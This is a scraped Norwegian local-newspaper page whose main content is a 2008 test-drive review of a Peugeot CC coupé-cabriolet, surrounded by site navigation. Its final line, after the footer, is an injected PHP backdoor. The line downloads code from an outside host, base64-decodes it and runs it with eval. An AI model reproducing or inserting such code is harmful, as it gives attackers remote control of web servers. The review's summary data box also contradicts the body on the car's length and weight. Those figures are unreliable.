Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juli 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vær - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bøker
Musikk
Film
Byen vår
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrått
Figgjo
Ganddal
Hana
Høle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Håndball
Kultur
Politikk
Økonomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersåk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Båt
Tog
Snerten kabriolet
Skrevet av ingve østensen   
onsdag 03. september 2008

Velger du en Peugot cc cab får du både i pose og sekk – en kabriolet og en kupé i en og samme bil. Tar du deg en tur med taket på, oppdager du raskt at det er lite støy inne i bilen. I tillegg tar det bare 25 sekunder å forvandle bilen fra en kupé til en kabriolet! Bilen kan også vaskes i vaskeautomat. Med taket oppe føler man at man har en helt vanlig bil - også om vinteren.

Snerten kabriolet

God komfort

På landeveien har den svært god komfort, og den trives også godt på motorveien. Jeg testet bilen på småveier, grusveier og på motorveien, og må konkludere med at bilen oppleves som veldig kontant og stiv. På samme tid er bilen både myk og behagelig. Bremsene er gode og lette å dosere, og styringen oppleves også som bra. Sittekomforten er det heller ikke noe å utsette på. Du kan velge skinn interiør, seter med varme, og skinnratt. Setene er gode og du sitter svært godt i denne bilen. Plasseringen av koppholderen er jeg derimot ikke like fornøyd med.

Peugot cc cab 

Godt utstyrt

Hanskerommet er låsbart, har lys og AC-funksjon. Alle biler burde egentlig ha mulighet for å nedkjøle hanskerommet via bilens aircondition. Bilen har elektrisk styring av alle 4 vinduer og egen bryter for taket. Den har såkalt PDC, eller ryggesensor, Cruise Control og fartsbegrenser. Det vil si at du kan holde en viss fart automatisk eller du kan legge inn en fart du ikke vil gå over når du trår på gassen. Selv syntes jeg at avstanden mellom gass- og bremsepedal ikke var stor nok, men dette er nok en vanesak. Manuelt og automatisk klimaanlegg med to soner gjør at du kan ha en temperatur på førersiden og en temperatur på passasjersiden. Du kan også velge å bare stille inn temperaturen, og deretter sette den på automatisk. Cd-spiller og Radio, som også tar MP3-låter via cd, spiller bra og har en god bass. Du kan også velge å koble til en ekstern lydkilde, f.eks. MP3. Den kobler du til et inntak i hanskerommet.

Sikker bil

Sikkerheten er også på topp. Bilen er utstyrt med blant annet automatiske veltebøyler bak, og ABS blokkeringsfrie bremser med nødbremsassistanse. Den har i tillegg airbager både fremme, på sidene fremme og i knehøyde for føreren. Det finnes en to-trinns bryter for utkopling av airbag på passasjersiden. Bilen har også isofix for barnestol. ESP og ASR, altså antiskrens og antispinn system, hjelper deg ved start i bakke og ved bremsing eller gassing i sving. Dette er spesielt anvendelig på glatt føre. Sikkerhetsbeltene er utstyrt med automatisk strammer og blokkerer foran. Ved kraftig oppbremsing tennes automatisk varselblink for å tiltrekke seg oppmerksomheten til bilisten bak. Ved kollisjon kuttes automatisk bensintilførselen for å minimere brannfaren. I tillegg til alt dette sikkerhetsutstyret har også bilen alarm, startsperre og superlås.

Peugot cc cab

Teknisk data

Bilen er kun 4,37m lang, og dermed enkel å lukeparkere. Motoren er på 1598ccm, og yter 120hk ved 6000 rpm og 160nm ved 4250 rpm. Den tar deg fra 0 til 100 på ca. 10,7 sek, og har en toppfart på 174 km/h. Bilen veier 1352 kg, og har et forbruk på 0,53 pr mil. Bagasjerommet tar 449 liter med taket oppe og 187 liter med taket nede. Baksetet er for to småvokste personer, altså helst barn. Jeg vil ikke anbefale voksne å sitte bak under lange turer.

Pris på testbil: Ca kr 300.000,- Dersom du er på jakt etter en snerten kabriolet/kupé kan vi absolutt anbefale en testtur.

LITT DATA
Lengde: 470 mm
Vekt: 152 kg
Effekt: 120 hk
Sylindertall: 4
Motorvolum: 1598 ccm
Dreiemoment: 160 Nm
Forbruk: 0,53 l/mil
0-100 km/t: 10,7 sek
Toppfart: 174 km/t
Pris fra: 300.000 kroner

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));